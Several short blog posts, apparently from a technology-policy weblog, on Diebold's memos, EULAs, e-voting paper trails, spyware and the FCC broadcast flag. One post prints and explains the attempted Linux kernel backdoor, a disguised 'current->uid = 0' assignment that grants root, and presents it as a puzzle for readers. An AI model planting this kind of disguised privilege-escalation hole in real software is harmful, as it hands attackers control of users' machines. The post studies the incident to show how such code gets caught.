
Diebold to Stop Suppressing Memos

Diebold has filed a court document promising not to sue people for posting the now-famous memos, and withdrawing the DMCA takedown notices it had sent previously. It’s a standard-issue lawyer’s non-surrender surrender (“Mr. Bonaparte, having demonstrated his mastery of the Waterloo battlefield, chooses to withdraw at this time”), asserting that “[u]nder well-established copyright law” Diebold could win an infringement suit, but that Diebold has decided anyway not to sue, given that it no longer has any realistic hope of suppressing distribution of the memos.

Diebold’s filing also contains this interesting sentence:

Diebold has informally encouraged the students to refrain from publishing passwords, source codes, information protected by employees’ privacy interests, and trade secret-type information, none of which is essential for purposes of criticism.

Some of these things certainly are essential for criticism. Diebold’s source code, for instance, is the most precise description of how their technology works, so it has obvious relevance to criticism of the technology’s security or reliability. Trade secret information includes facts about the failure history of the product, which are also highly relevant.

I’m not saying that it is always legal or ethical to publish companies’ source code or trade secrets, no matter what the circumstances. But in this case, some code and some trade secrets are essential for criticism, and Diebold’s assertion to the contrary doesn’t pass the laugh test.

[Link via Larry Lessig.]


Taming EULAs

Most software programs, and some websites, are subject to End User License Agreements (EULAs). EULAs are long and detailed and apparently written by lawyer-bots. Almost everybody agrees to them without even reading them. A EULA is a contract, but it’s not the result of a negotiation between the vendor and the user. The vendor writes the EULA, and the user can take it or leave it. Most users just accept EULAs without thinking.

This has led to any number of problems. For example, some EULAs give the software vendors permission to install spyware – and most users never realize they have granted that permission.

Why don’t users pay more attention to EULAs? Rational ignorance is one possibility – it may be that the cost of accepting a bad EULA every now and then is lower than the cost of actually reading EULAs and making careful decisions. If so, then a rational cost-minimizing user won’t read EULAs.

And there are a few oddballs who read EULAs. When these people find a particularly egregious provision, they spread the word. Occasionally the press will report on an extreme EULA. So rationally ignorant consumers get a little information about popular EULAs, and there is some pressure on vendors to keep their EULAs reasonable.

In domains where rational ignorance is common, tools often spring up to help people make decisions that are more rational and less ignorant. If it’s not worth your time to research your senator’s voting record, you can look at how he is rated by the Environmental Defense Fund or the NRA, or you can see who has endorsed him for reelection. None of these sources captures the nuances of an individual voting record. But if you’re not going to spend the time to examine that record, these crude tools can be valuable.

When it comes to EULAs, we don’t have these tools. So let’s create them. Let me suggest two useful tools.

The first tool is a service, provided via a website, that rates EULAs in the same way that political advocacy groups rate legislators. I’m not talking about a detailed explanation – which rationally ignorant users wouldn’t bother to read – but a simple one-dimensional rating, such as a grade on an A-to-F scale. Products whose EULAs get good scores might be allowed to display a trademarked “Our EULA got an A-” logo.

Naturally, reducing a complex EULA to a single rating is an oversimplification. But that’s exactly the point. Rationally ignorant users demand simplification, and if they don’t get it they’ll decide based on no information at all. The site could offer more details for users who want them. But let’s face it: most users don’t.

The second tool is a standardized template for writing EULAs, akin to the structure of Creative Commons licenses. You’d have some core EULA language, along with a set of modules that could be added at the vendor’s discretion. A standardized EULA could be displayed concisely to the user, by listing the modules it includes. It could also be expressed easily in machine-readable form, so that various automated tools could be created.

The main benefit of standardization is that users could re-use what they had learned about past licenses, so that the cost of learning about a license could be amortized over more decisions. Standardization would also seem to benefit those companies who have more likable EULAs, since it would help users notice the substantive differences between the EULAs they see.
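To make the machine-readable idea concrete, here is a minimal sketch in C of what a standardized EULA record might look like. The module names here are invented purely for illustration; a real template would need a carefully chosen, agreed-upon vocabulary.

    /* Hypothetical machine-readable EULA: a core license version plus a
       bitmask of optional modules chosen by the vendor.  All module names
       below are made up for illustration. */
    #include <stdio.h>

    #define EULA_MOD_NO_REVERSE_ENGINEERING  (1 << 0)
    #define EULA_MOD_ARBITRATION_ONLY        (1 << 1)
    #define EULA_MOD_DATA_COLLECTION         (1 << 2)
    #define EULA_MOD_AUTO_UPDATES            (1 << 3)

    struct eula {
        int core_version;      /* which standard core text applies */
        unsigned int modules;  /* which optional modules are added */
    };

    /* A tool could flag any modules the user has said they never accept. */
    static int eula_acceptable(const struct eula *e, unsigned int refused)
    {
        return (e->modules & refused) == 0;
    }

    int main(void)
    {
        struct eula vendor_eula = {
            1, EULA_MOD_AUTO_UPDATES | EULA_MOD_DATA_COLLECTION
        };
        unsigned int my_refusals = EULA_MOD_DATA_COLLECTION;

        printf("acceptable: %s\n",
               eula_acceptable(&vendor_eula, my_refusals) ? "yes" : "no");
        return 0;
    }

The point is only that once licenses share a structure like this, very simple tools can compare them, summarize them, or warn the user about modules she has decided in advance never to accept.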

Will either of these things happen? I don’t know. But I would like to see somebody try them.


California to Require Open-Source in Voting Software?

Donna Wentworth at Copyfight points to the fine print in the recent e-voting edict from California Secretary of State Kevin Shelley, which says this:

Any electronic verification method must have open source code in order to be certified for use in a voting system in California.

Many computer scientists have argued that e-voting systems should be required to have open source code, because of the special circumstances surrounding voting. Is that what Mr. Shelley is requiring?

I’m not sure. His requirement applies to “electronic verification method[s]” and not explicitly to all e-voting systems. What exactly is an “electronic verification method”? Mr. Shelley’s directive uses this term in reference to the report of a previous task force on e-voting.

So what does the task force’s report say? Surprisingly, the report refers to “electronic verification” methods at several points, but I couldn’t find any specific mention of what those methods might be. This is particularly odd considering that the task force members included computer scientists (including David Dill and David Jefferson) who are more than qualified to understand and write about any “electronic verification” methods, even if only to summarize them or give examples.

It looks as if there might be a hidden layer to this story, but I can’t figure out what it could be. Can anybody help out?

[Correction (1:50 PM): corrected the spelling of Kevin Shelley's last name.]


California to Require E-Voting Paper Trail

California Secretary of State Kevin Shelley will announce today that as of 2006, all e-voting machines in the state must provide a voter-verifiable paper trail, according to an L.A. Times story by Allison Hoffman and Tim Reiterman.

This is yet another sign that the push for sensible e-voting safeguards is gaining momentum.

[Link credit: Siva Vaidhyanathan at Sivacracy.net.]


Princeton Ignores Strauss, Makes Sensible Decisions

The Office of Information Technology (OIT) here at Princeton has taken the unusual step of issuing a statement distancing itself from the views expressed by one of its employees, Howard Strauss, in a column in Syllabus magazine.

(OIT operates the campus network and other shared computing facilities. It is not to be confused with the Computer Science Department, which is the main site of information technology teaching and research at Princeton.)

Mr. Strauss’s column, which really has to be read to be believed, likens open source products to fraudulent Nigerian spam emails.

Fortunately the grownups in charge at OIT responded by reiterating the university’s non-Straussian procurement policy, which is based not on a rigid pro- or anti-open source rule but instead involves – listen carefully, ’cause this might be hard to follow – looking at all of the available products and choosing the best one for the job.


CDT Report on Spyware

The Center for Democracy and Technology has issued a sensible and accessible paper about the spyware problem and associated policy issues.

Spyware is software, installed on your computer without your consent, that gathers information about what you do on your computer. It’s shockingly common – if you are a typical active web surfer using Internet Explorer in its default configuration, and you haven’t been taking specific steps to protect yourself against spyware, then you probably have several spyware programs on your computer right now.

CDT recommends that end users protect themselves by using anti-spyware tools such as AdAware, Spybot Search and Destroy, Spyware Eliminator, or BPS Spyware/Adware Remover. (I have had good luck with Spybot Search and Destroy.)

At the policy level, CDT is lukewarm about attempts to ban spyware specifically, because of the difficult line-drawing exercise involved in distinguishing spyware from certain types of legitimate programs. They argue instead for policies that address the underlying problems: installation without consent, and surreptitious monitoring of user behavior.

Kudos to CDT for advancing the policy discussion on this often overlooked issue.


Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports:

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.


Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a bad guy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source developers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]
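For those who would rather not puzzle over it: the widely reported explanation of this snippet is that the giveaway is the single “=”. What looks like a harmless error check comparing the caller’s user id to zero is actually an assignment that sets it to zero – that is, to root:

    /* What an innocent-looking check would be: reject this bogus flag
       combination if the caller is root. */
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
            retval = -EINVAL;

    /* What was actually submitted: "current->uid = 0" ASSIGNS uid 0 (root)
       to the calling process.  The assignment evaluates to 0, so the &&
       is false and the error is never returned -- the uid change happens
       silently whenever a local user passes this odd flag combination. */
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;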


New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)


Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The precise scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by a formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they won’t make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).
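For readers who want a sense of what that separation step involves: a digital TV broadcast is, roughly speaking, an MPEG-2 transport stream of fixed-size 188-byte packets, each carrying a 13-bit packet identifier (PID) that says which elementary stream – video, audio, or program metadata – it belongs to. Here is a minimal, illustrative C sketch of reading such a stream and sorting packets by PID; real Transport Stream Processors (and the Order’s compliance requirements) are of course far more involved than this.

    #include <stdint.h>
    #include <stdio.h>

    #define TS_PACKET_SIZE 188
    #define TS_SYNC_BYTE   0x47

    /* Extract the 13-bit PID that identifies which elementary stream
       (video, audio, or program metadata) a transport packet belongs to. */
    static int ts_pid(const uint8_t *pkt)
    {
        if (pkt[0] != TS_SYNC_BYTE)
            return -1;                      /* lost sync */
        return ((pkt[1] & 0x1F) << 8) | pkt[2];
    }

    int main(void)
    {
        uint8_t pkt[TS_PACKET_SIZE];

        /* Read packets from a captured stream on stdin and report their PIDs;
           a real demultiplexer would route each PID to the right decoder. */
        while (fread(pkt, 1, TS_PACKET_SIZE, stdin) == TS_PACKET_SIZE) {
            int pid = ts_pid(pkt);
            if (pid >= 0)
                printf("packet on PID 0x%04x\n", pid);
        }
        return 0;
    }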

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side-effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.